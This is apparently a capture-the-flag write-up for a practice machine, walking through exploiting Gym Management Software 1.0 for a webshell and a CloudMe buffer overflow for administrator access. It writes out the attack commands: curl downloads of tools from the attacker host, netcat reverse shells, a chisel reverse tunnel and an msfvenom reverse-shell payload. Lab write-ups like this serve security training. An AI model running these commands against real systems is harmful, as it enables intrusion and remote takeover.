Although the box is rated as easy, it took me a lot of time.
I think there is something wrong with my port forwarding, but I finally managed to get root, which is something to celebrate.
0x00 Information collection
Using NAMP, it is easy to see that the target host has port 8080 open.namp -sS 10.10.10.198
A Web service runs on it.
Visit this website. We can know from 10.10.10.198:8080/contact.php that this website uses Gym Management Software 1.0
0x01 Own user
We can find out the Unauthenticated RCE vulnerability in this webapp by searching on exploits-db.
https://www.exploit-db.com/exploits/48506
Download this script. And runpython rce.py 10.10.10.198:8080. We can get a webshell.
With this webshell, we are easy to own user by using this payload.type %userprofile%\desktop\user.txt
0x02 Own root
At this point, we usually use some tools to collect system information to find the vulnerability of privilege escalation.
It’s a complicated job, and I won’t write it down.
I first run netstat -ano to see what ports the system is open to.
I found that port 8888 is only available locally.Then I found the process by the PID.
Search cloudme on exploits-db.
A vulnerability was found in remote command execution due to buffer overflow.
https://www.exploit-db.com/exploits/48389
To use this script, we need to forward port 8888.
Set up a simple HTTP server with Python, and use webshell’s curl to download some tools to the victim machine.
Run python3 -m http.server to set up a HTTP server.
Then runcurl -O 10.10.15.91:8000/nc.exe and curl -O 10.10.15.91:8000/chisel.exe on webshell.
Get the reverse shell through nc.
Run nc -lvp 6666 to listening.
Run nc -e cmd.exe 10.10.15.91 6666 on webshell.
Next step. We run ./chisel server -port 8080 --reverse to create the Chisel server side.
And, run chisel.exe client 10.10.15.91:8080 R:8888:127.0.0.1:8888 on reverse shell.
So we can forward port 8888 through this reverse tunnel.
Then run msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.15.91 1999' -b '\x00\x0A\x0D' -f python -v payload to generate our payload.
And then replace the payload in the POC script.
Run nc -lvp 1999 and run the srcript. We can get a administrator shell from nc listening.
If you are an international friend and have seen my article.First of all, I’d like to thank you for coming, and then I hope you will forgive me for this Chinglish. Just for fun :)